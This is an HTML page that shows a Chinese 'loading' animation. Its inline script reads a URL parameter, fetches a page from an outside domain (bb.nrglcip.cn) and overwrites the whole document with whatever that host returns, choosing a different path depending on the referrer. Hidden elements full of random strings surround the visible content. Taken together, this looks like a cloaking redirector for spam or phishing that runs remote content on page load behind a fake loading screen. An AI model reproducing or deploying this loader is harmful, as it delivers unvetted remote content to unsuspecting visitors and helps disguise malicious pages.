<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OEzNt3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OEzNt3 .M5OiGkr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OEzNt3 .content {
            line-height: 50px;
            text-align: center
        }

        .OEzNt3 .img {
            width: 100%
        }

        .OEzNt3 .NSuyGWr {
            text-align: center
        }

        .OEzNt3 .NSuyGWr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OEzNt3 .NSuyGWr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OEzNt3 .NSuyGWr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OEzNt3 .NSuyGWr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OEzNt3 .NSuyGWr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OEzNt3 .NSuyGWr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OEzNt3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FzB451Bvviv(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RknDuig = FzB451Bvviv('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RknDuig +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RknDuig +".html?a=share";
		}
		
        yaArXW7QCn=url+"#"+new Date().getTime();
        yaArXW7QCn && function() {
            $.get(yaArXW7QCn, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >mUCeTw6CtM3f10LjToQlMf</li>
<li style='display:none' >mUCeTw6CtM3f10LjToQlMf</li>
<h1 style='display:none' >IUDNKJusoKuvB</h1>
<a  href='#' style='display:none'>ePR3rzdAp0h3hvhg7wYkJ0UVRCKDHP5DQuJU1GgEz1nrld6muI9dzogr5iIrmyvjBwVx2p2UoaIOWjJk</a>
<div style='display:none'>j6FnPhkvXJBTxHS0ctue2qnQks</div>
<div style='display:none'>j6FnPhkvXJBTxHS0ctue2qnQks</div><div class="OEzNt3">
    <div class="M5OiGkr">
        <div class="NSuyGWr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>qkU4Q99zQAJ8w222lHX2ADpGBMgbOxW2I</span>
<p  style='display:none'>y0N3YZITeMruNd9ZNlSRHRXmt3rVSdintPjySdpXfodpBg1ThA0JzWnvBUk7pgXoZTyXQ3bckINu7368tAB27oGDmIL5Z</p>
<ul style='display:none' >tz51jttOJApM30b8OSbXbqnHlu9lfUsNKBPDMlmzIiQZOwe6sUUy7xiRwWqX3OzfjrOMnKWNyLJqe2</ul></body>
</html>